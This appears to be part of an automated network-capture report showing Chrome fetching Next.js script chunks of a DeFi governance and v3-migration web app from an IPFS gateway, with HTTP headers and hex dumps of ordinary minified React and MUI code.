                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC900OUTGET /_next/static/chunks/1102-a299e0e4a621aea1.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                  Purpose: prefetch
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1357INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:12:00 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 9645
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifmkmwowlbcfp2o6axtj7jqa5e7esgfkjaimyyswbg53vjpgdbvuu"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1102-a299e0e4a621aea1.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreifmkmwowlbcfp2o6axtj7jqa5e7esgfkjaimyyswbg53vjpgdbvuu
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 87696
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 38 35 30 66 63 33 38 63 32 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4850fc38c29-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1307INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 31 30 32 5d 2c 7b 39 36 34 37 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6f 3d 72 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6e 3d 6f 28 72 28 36 34 39 33 38 29 29 2c 61 3d 72 28 38 35 38 39 33 29 2c 69 3d 28 30 2c 6e 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 32 30 20 31 31 48 37 2e 38 33 6c 35 2e 35 39 2d 35 2e 35 39 4c 31 32 20 34 6c 2d 38 20 38 20 38 20 38 20 31 2e 34 31 2d 31 2e 34 31 4c 37 2e 38 33 20 31 33 48 32 30 76 2d 32 7a 22 7d 29 2c
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1102],{96471:function(e,t,r){var o=r(64836);t.Z=void 0;var n=o(r(64938)),a=r(85893),i=(0,n.default)((0,a.jsx)("path",{d:"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"}),
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 32 68 31 34 63 31 2e 31 20 30 20 32 2d 2e 39 20 32 2d 32 56 35 63 30 2d 31 2e 31 2d 2e 39 2d 32 2d 32 2d 32 7a 22 7d 29 2c 22 43 68 65 63 6b 42 6f 78 4f 75 74 6c 69 6e 65 42 6c 61 6e 6b 22 29 2c 68 3d 28 30 2c 75 2e 5a 29 28 28 30 2c 64 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 39 20 33 48 35 63 2d 31 2e 31 31 20 30 2d 32 20 2e 39 2d 32 20 32 76 31 34 63 30 20 31 2e 31 2e 38 39 20 32 20 32 20 32 68 31 34 63 31 2e 31 31 20 30 20 32 2d 2e 39 20 32 2d 32 56 35 63 30 2d 31 2e 31 2d 2e 38 39 2d 32 2d 32 2d 32 7a 6d 2d 39 20 31 34 6c 2d 35 2d 35 20 31 2e 34 31 2d 31 2e 34 31 4c 31 30 20 31 34 2e 31 37 6c 37 2e 35 39 2d 37 2e 35 39 4c 31 39 20 38 6c 2d 39 20 39 7a 22 7d 29 2c 22 43 68 65 63 6b 42 6f 78 22 29 2c 6d 3d 28 30 2c 75 2e 5a 29 28 28 30
                                                                                                                                                                                                                                                  Data Ascii: 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),h=(0,u.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 14l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"}),"CheckBox"),m=(0,u.Z)((0
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 72 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 7d 7d 7d 2c 22 64 65 66 61 75 6c 74 22 21 3d 3d 74 2e 63 6f 6c 6f 72 26 26 7b 5b 60 26 2e 24 7b 5a 2e 63 68 65 63 6b 65 64 7d 2c 20 26 2e 24 7b 5a 2e 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 7d 60 5d 3a 7b 63 6f 6c 6f 72 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 5b 74 2e 63 6f 6c 6f 72 5d 2e 6d 61 69 6e 7d 2c 5b 60 26 2e 24 7b 5a 2e 64 69 73 61 62 6c 65 64 7d 60 5d 3a 7b 63 6f 6c 6f 72 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 7d 7d 29 29 29 2c 78 3d 28 30 2c 64 2e 6a 73 78 29 28 68 2c 7b 7d 29 2c 7a 3d 28 30 2c 64 2e 6a 73 78 29 28 70 2c 7b 7d 29 2c 43 3d 28 30 2c 64 2e 6a 73 78 29 28 6d 2c 7b 7d 29 3b 76 61 72 20 6b 3d 61 2e 66
                                                                                                                                                                                                                                                  Data Ascii: r:"transparent"}}},"default"!==t.color&&{[`&.${Z.checked}, &.${Z.indeterminate}`]:{color:(e.vars||e).palette[t.color].main},[`&.${Z.disabled}`]:{color:(e.vars||e).palette.action.disabled}}))),x=(0,d.jsx)(h,{}),z=(0,d.jsx)(p,{}),C=(0,d.jsx)(m,{});var k=a.f
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 3b 76 61 72 20 68 3d 72 28 38 35 38 39 33 29 3b 63 6f 6e 73 74 20 6d 3d 5b 22 62 61 73 65 43 6c 61 73 73 4e 61 6d 65 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 2c 22 63 6f 6c 6f 72 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 22 2c 22 66 6f 6e 74 53 69 7a 65 22 5d 2c 66 3d 28 30 2c 73 2e 5a 50 29 28 22 73 70 61 6e 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 49 63 6f 6e 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 7b 6f 77 6e 65 72 53 74 61 74 65 3a 72 7d 3d 65 3b 72 65 74 75 72 6e 5b 74 2e 72 6f 6f 74 2c 22 69 6e 68 65 72 69 74 22 21 3d 3d 72 2e 63 6f 6c 6f 72 26 26 74 5b 60 63 6f 6c 6f 72 24 7b 28 30 2c 75 2e 5a 29 28 72 2e 63 6f 6c 6f 72 29 7d 60 5d 2c 74 5b 60 66 6f 6e 74 53 69 7a 65
                                                                                                                                                                                                                                                  Data Ascii: ;var h=r(85893);const m=["baseClassName","className","color","component","fontSize"],f=(0,s.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,"inherit"!==r.color&&t[`color${(0,u.Z)(r.color)}`],t[`fontSize
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 73 4e 61 6d 65 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 61 2c 22 6e 6f 74 72 61 6e 73 6c 61 74 65 22 2c 5a 2e 72 6f 6f 74 2c 73 29 2c 6f 77 6e 65 72 53 74 61 74 65 3a 79 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 21 30 2c 72 65 66 3a 74 7d 2c 77 29 29 7d 29 29 3b 76 2e 6d 75 69 4e 61 6d 65 3d 22 49 63 6f 6e 22 3b 76 61 72 20 62 3d 76 7d 2c 38 30 32 32 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6f 3d 72 28 36 37 32 39 34 29 3b 63 6f 6e 73 74 20 6e 3d 6f 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f
                                                                                                                                                                                                                                                  Data Ascii: sName:(0,i.default)(a,"notranslate",Z.root,s),ownerState:y,"aria-hidden":!0,ref:t},w))}));v.muiName="Icon";var b=v},80227:function(e,t,r){var o=r(67294);const n=o.forwardRef((function(e,t){return o.createElement("svg",Object.assign({xmlns:"http://www.w3.o
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 29 28 68 29 2c 28 30 2c 63 2e 70 66 29 28 68 2c 70 29 2c 28 30 2c 63 2e 4a 4e 29 28 70 29 3b 63 6f 6e 73 74 5b 6d 5d 3d 6f 2e 75 73 65 53 74 61 74 65 28 28 28 29 3d 3e 6e 65 77 20 74 28 72 2c 68 29 29 29 2c 66 3d 6d 2e 67 65 74 4f 70 74 69 6d 69 73 74 69 63 52 65 73 75 6c 74 28 68 29 3b 69 66 28 28 30 2c 6e 2e 24 29 28 6f 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 28 65 3d 3e 64 3f 28 29 3d 3e 7b 7d 3a 6d 2e 73 75 62 73 63 72 69 62 65 28 61 2e 56 2e 62 61 74 63 68 43 61 6c 6c 73 28 65 29 29 29 2c 5b 6d 2c 64 5d 29 2c 28 28 29 3d 3e 6d 2e 67 65 74 43 75 72 72 65 6e 74 52 65 73 75 6c 74 28 29 29 2c 28 28 29 3d 3e 6d 2e 67 65 74 43 75 72 72 65 6e 74 52 65 73 75 6c 74 28 29 29 29 2c 6f 2e 75 73 65 45 66 66 65 63 74 28 28 28 29 3d 3e 7b 6d 2e 73 65 74 4f 70 74 69
                                                                                                                                                                                                                                                  Data Ascii: )(h),(0,c.pf)(h,p),(0,c.JN)(p);const[m]=o.useState((()=>new t(r,h))),f=m.getOptimisticResult(h);if((0,n.$)(o.useCallback((e=>d?()=>{}:m.subscribe(a.V.batchCalls(e))),[m,d]),(()=>m.getCurrentResult()),(()=>m.getCurrentResult())),o.useEffect((()=>{m.setOpti
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 62 6c 65 3a 6f 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 5b 6e 5d 3d 65 2c 7b 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 3a 61 7d 3d 6e 3b 69 66 28 61 29 7b 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 76 69 73 69 62 6c 65 3a 21 30 7d 2c 28 28 29 3d 3e 7b 6f 26 26 6f 28 29 7d 29 29 3b 63 6f 6e 73 74 20 65 3d 6e 75 6c 6c 3d 3d 28 74 3d 74 68 69 73 2e 77 72 61 70 70 65 72 29 3f 76 6f 69 64 20 30 3a 74 2e 63 75 72 72 65 6e 74 3b 65 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 28 6e 75 6c 6c 3d 3d 28 72 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 4f 62 73 65 72 76 65 72 29 7c 7c 72 2e 75 6e 6f 62 73 65 72 76 65 28 65 29 29 7d 7d 29 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 4f 62 73 65 72 76 65 72 3d 6e 75 6c 6c 2c 74 68 69 73 2e
                                                                                                                                                                                                                                                  Data Ascii: ble:o}=this.props,[n]=e,{isIntersecting:a}=n;if(a){this.setState({visible:!0},(()=>{o&&o()}));const e=null==(t=this.wrapper)?void 0:t.current;e&&e instanceof HTMLElement&&(null==(r=this.elementObserver)||r.unobserve(e))}})),this.elementObserver=null,this.
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC124INData Raw: 7d 61 28 73 2c 22 64 65 66 61 75 6c 74 50 72 6f 70 73 22 2c 7b 65 6c 65 6d 65 6e 74 54 79 70 65 3a 22 64 69 76 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 22 2c 6f 66 66 73 65 74 3a 30 2c 74 68 72 65 73 68 6f 6c 64 3a 30 2c 77 69 64 74 68 3a 6e 75 6c 6c 2c 6f 6e 43 6f 6e 74 65 6e 74 56 69 73 69 62 6c 65 3a 6e 75 6c 6c 2c 68 65 69 67 68 74 3a 6e 75 6c 6c 7d 29 7d 7d 5d 29 3b
                                                                                                                                                                                                                                                  Data Ascii: }a(s,"defaultProps",{elementType:"div",className:"",offset:0,threshold:0,width:null,onContentVisible:null,height:null})}}]);


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  146192.168.2.549872209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC914OUTGET /_next/static/chunks/pages/v3-migration-cb3960f54b93b1d0.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                  Purpose: prefetch
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:12:00 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 49123
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifvhgjsggfse44pq22t56n7poz3xci67aka2wetni3fdcau7wxpvq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/pages/v3-migration-cb3960f54b93b1d0.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiarzqpstoo26we45swmenr4cty2xldwzxkk3de3tw2jrdlwkngi2a,bafkreifvhgjsggfse44pq22t56n7poz3xci67aka2wetni3fdcau7wxpvq
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC137INData Raw: 78 2d 69 70 66 73 2d 70 6f 70 3a 20 72 61 69 6e 62 6f 77 2d 64 63 31 33 2d 31 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 38 37 36 39 35 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 38 34 66 64 63 64 34 33 38 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: x-ipfs-pop: rainbow-dc13-10CF-Cache-Status: HITAge: 87695Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e484fdcd4385-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 35 36 32 5d 2c 7b 34 30 33 34 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 74 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 69 3d 72 28 34 39 35 30 31 29 2c 73 3d 72 28 33 30 31 32 30 29 2c 61 3d 72 28 35 31 35 32 29 2c 6f 3d 72 28 31 31 31 36 33 29 2c 6c 3d 72 28 36 37 32 39 34 29 2c 63 3d 72 28 34 35 37 34 35 29 2c 64 3d 72 28 31 35 34 34 36 29 2c 75 3d 72 28 32 35 35 36 33 29 2c 78 3d 72 28 31 35 30 37
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4562],{40342:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return nt}});var n=r(59499),i=r(49501),s=r(30120),a=r(5152),o=r(11163),l=r(67294),c=r(45745),d=r(15446),u=r(25563),x=r(1507
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 30 3d 3d 3d 74 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 74 2e 75 73 65 72 52 65 73 65 72 76 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 63 61 6c 65 64 41 54 6f 6b 65 6e 42 61 6c 61 6e 63 65 2c 72 3d 65 2e 70 72 69 6e 63 69 70 61 6c 53 74 61 62 6c 65 44 65 62 74 2c 6e 3d 65 2e 73 63 61 6c 65 64 56 61 72 69 61 62 6c 65 44 65 62 74 3b 72 65 74 75 72 6e 28 30 2c 5a 2e 57 78 29 28 69 2c 65 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 29 3e 3d 30 26 26 28 74 3d 22 30 22 29 2c 73 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 3d 3d 65 2e 75 6e 64 65 72 6c 79 69 6e 67 41
                                                                                                                                                                                                                                                  Data Ascii: 0===t||null===(o=t.userReserves)||void 0===o?void 0:o.map((function(e){var t=e.scaledATokenBalance,r=e.principalStableDebt,n=e.scaledVariableDebt;return(0,Z.Wx)(i,e.underlyingAsset)>=0&&(t="0"),s.filter((function(t){return t.underlyingAsset==e.underlyingA
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 72 20 75 3d 28 30 2c 6d 2e 65 39 29 28 28 30 2c 76 2e 67 55 29 28 74 2e 69 6e 63 72 65 61 73 65 64 53 74 61 62 6c 65 42 6f 72 72 6f 77 73 2c 65 2e 72 65 73 65 72 76 65 2e 64 65 63 69 6d 61 6c 73 29 2c 63 29 3b 73 3d 28 30 2c 70 2e 68 45 29 28 73 29 2e 70 6c 75 73 28 75 29 2e 74 6f 53 74 72 69 6e 67 28 29 7d 69 66 28 69 29 7b 76 61 72 20 78 3b 6c 3d 69 2e 75 73 61 67 65 41 73 43 6f 6c 6c 61 74 65 72 61 6c 45 6e 61 62 6c 65 64 4f 6e 55 73 65 72 56 33 3b 76 61 72 20 68 3d 28 30 2c 70 2e 68 45 29 28 65 2e 73 63 61 6c 65 64 41 54 6f 6b 65 6e 42 61 6c 61 6e 63 65 29 2c 62 3d 28 30 2c 70 2e 68 45 29 28 65 2e 72 65 73 65 72 76 65 2e 6c 69 71 75 69 64 69 74 79 49 6e 64 65 78 29 2c 6a 3d 28 6e 75 6c 6c 3d 3d 3d 28 78 3d 61 5b 6e 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d
                                                                                                                                                                                                                                                  Data Ascii: r u=(0,m.e9)((0,v.gU)(t.increasedStableBorrows,e.reserve.decimals),c);s=(0,p.hE)(s).plus(u).toString()}if(i){var x;l=i.usageAsCollateralEnabledOnUserV3;var h=(0,p.hE)(e.scaledATokenBalance),b=(0,p.hE)(e.reserve.liquidityIndex),j=(null===(x=a[n])||void 0==
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 72 61 74 69 6f 6e 2c 69 3d 65 2e 75 73 65 72 53 75 6d 6d 61 72 79 42 65 66 6f 72 65 4d 69 67 72 61 74 69 6f 6e 2c 61 3d 65 2e 73 65 6c 65 63 74 61 62 6c 65 4d 61 72 6b 65 74 73 2c 6f 3d 65 2e 73 65 74 46 72 6f 6d 4d 61 72 6b 65 74 44 61 74 61 2c 63 3d 65 2e 6c 6f 61 64 69 6e 67 2c 64 3d 28 30 2c 6c 2e 75 73 65 53 74 61 74 65 29 28 6e 75 6c 6c 29 2c 75 3d 64 5b 30 5d 2c 78 3d 64 5b 31 5d 2c 68 3d 42 6f 6f 6c 65 61 6e 28 75 29 2c 76 3d 28 30 2c 75 65 2e 4d 6f 29 28 72 2e 63 68 61 69 6e 49 64 29 3b 72 65 74 75 72 6e 28 30 2c 78 65 2e 6a 73 78 73 29 28 73 2e 5a 2c 7b 73 78 3a 7b 70 61 64 64 69 6e 67 3a 22 31 32 70 78 20 31 36 70 78 20 31 36 70 78 20 31 36 70 78 22 2c 62 6f 72 64 65 72 3a 31 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 64 69 76 69 64 65 72 22 2c
                                                                                                                                                                                                                                                  Data Ascii: ration,i=e.userSummaryBeforeMigration,a=e.selectableMarkets,o=e.setFromMarketData,c=e.loading,d=(0,l.useState)(null),u=d[0],x=d[1],h=Boolean(u),v=(0,ue.Mo)(r.chainId);return(0,xe.jsxs)(s.Z,{sx:{padding:"12px 16px 16px 16px",border:1,borderColor:"divider",
